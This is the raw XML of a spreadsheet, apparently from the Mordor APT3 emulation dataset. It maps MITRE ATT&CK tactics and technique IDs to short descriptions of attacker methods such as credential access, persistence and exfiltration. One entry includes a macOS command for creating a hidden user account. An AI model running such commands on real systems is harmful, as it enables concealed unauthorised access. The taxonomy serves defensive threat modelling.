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wardog/Documents/GitHub/mordor/large_datasets/apt3/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{DEEDDEFA-59FC-4346-8CC0-46A693B62527}" xr6:coauthVersionLast="33" xr6:coauthVersionMax="33" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="28800" windowHeight="18000" xr2:uid="{21A0D53D-E41C-BC46-9057-258617F16664}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>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 l="1"/>
  <c r="E46" i="1"/>
  <c r="E47" i="1"/>
  <c r="E48" i="1"/>
  <c r="E50" i="1"/>
  <c r="E51" i="1"/>
  <c r="E52" i="1"/>
  <c r="E53" i="1"/>
  <c r="E54" i="1"/>
  <c r="E55" i="1"/>
  <c r="E56" i="1"/>
  <c r="E57" i="1"/>
  <c r="E58" i="1"/>
  <c r="E59" i="1"/>
  <c r="E60" i="1"/>
  <c r="E61" i="1"/>
  <c r="E62" i="1"/>
  <c r="E63" i="1"/>
  <c r="E64" i="1"/>
  <c r="E65" i="1"/>
  <c r="E66" i="1"/>
  <c r="E67" i="1"/>
  <c r="E68" i="1"/>
  <c r="E69" i="1"/>
  <c r="E70" i="1"/>
  <c r="E71" i="1"/>
  <c r="E45" i="1"/>
  <c r="E44" i="1"/>
  <c r="E43" i="1"/>
  <c r="E41" i="1"/>
  <c r="E38" i="1"/>
  <c r="E37" i="1"/>
  <c r="E39" i="1"/>
  <c r="E40" i="1"/>
  <c r="E36" i="1"/>
  <c r="E35" i="1"/>
  <c r="E34" i="1"/>
  <c r="E29" i="1"/>
  <c r="E12" i="1"/>
  <c r="E8" i="1"/>
  <c r="E19" i="1"/>
  <c r="E7" i="1"/>
  <c r="E20" i="1"/>
  <c r="E6" i="1"/>
  <c r="E27" i="1"/>
  <c r="E9" i="1"/>
  <c r="E13" i="1"/>
  <c r="E28" i="1"/>
  <c r="E30" i="1"/>
  <c r="E32" i="1"/>
  <c r="E26" i="1"/>
  <c r="E22" i="1"/>
  <c r="E33" i="1"/>
  <c r="E23" i="1"/>
  <c r="E31" i="1"/>
  <c r="E42" i="1"/>
  <c r="E18" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1449" uniqueCount="882">
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Technique Id</t>
  </si>
  <si>
    <t>Technique Name</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>Access Token Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1182</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>T1103</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</si>
  <si>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</si>
  <si>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 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>AppleScript</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1131</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.</t>
  </si>
  <si>
    <t>T1119</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection.</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>T1009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1067</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries . The certificates used during an operation may be created, forged, or stolen by the adversary.</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>The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</si>
  <si>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T1090</t>
  </si>
  <si>
    <t>Connection Proxy</t>
  </si>
  <si>
    <t>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1094</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing Standard Application Layer Protocol. Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Some data encoding systems may also result in data compression, such as gzip.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>Data Staged</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Distributed Component Object Model</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model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</si>
  <si>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t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program. Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.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t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information from a target.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1048</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 standard services (like SMB or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.</t>
  </si>
  <si>
    <t>T1203</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1210</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1222</t>
  </si>
  <si>
    <t>File Permissions Modification</t>
  </si>
  <si>
    <t>File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>T1200</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1158</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the Create Account technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 .</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>HISTCONTROL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>T1062</t>
  </si>
  <si>
    <t>Hypervisor</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include modifying sensor settings stored in configuration files and/or Registry keys to disable or maliciously redirect event telemetry.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.</t>
  </si>
  <si>
    <t>T1141</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1118</t>
  </si>
  <si>
    <t>InstallUtil</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0).  Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects.</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>Launchctl</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD . The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different . By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>T1171</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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>Local Job Scheduling</t>
  </si>
  <si>
    <t>On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, at, and launchd. Unlike Scheduled Task on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 Users have direct control over login items installed using a shared file list which are also visible in System Preferences . These login items are stored in the user's ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist .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 The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like AppleScript can do this as well .</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Windows allows logon scripts to be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>Mshta</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Multilayer Encryption</t>
  </si>
  <si>
    <t>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>Netsh Helper DLL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1050</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings.</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>Plist Modification</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>PowerShell</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</si>
  <si>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</si>
  <si>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T1145</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.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To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.</t>
  </si>
  <si>
    <t>T1093</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>Rootkit</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Scheduled Task</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>Screensaver</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1063</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1101</t>
  </si>
  <si>
    <t>Security Support Provider</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Service Execution</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>T1051</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1178</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>In user mode, Windows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which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>Source</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1194</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1095</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</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</si>
  <si>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</si>
  <si>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T1165</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>Sudo Caching</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1154</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>T1127</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1065</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.</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</si>
  <si>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</si>
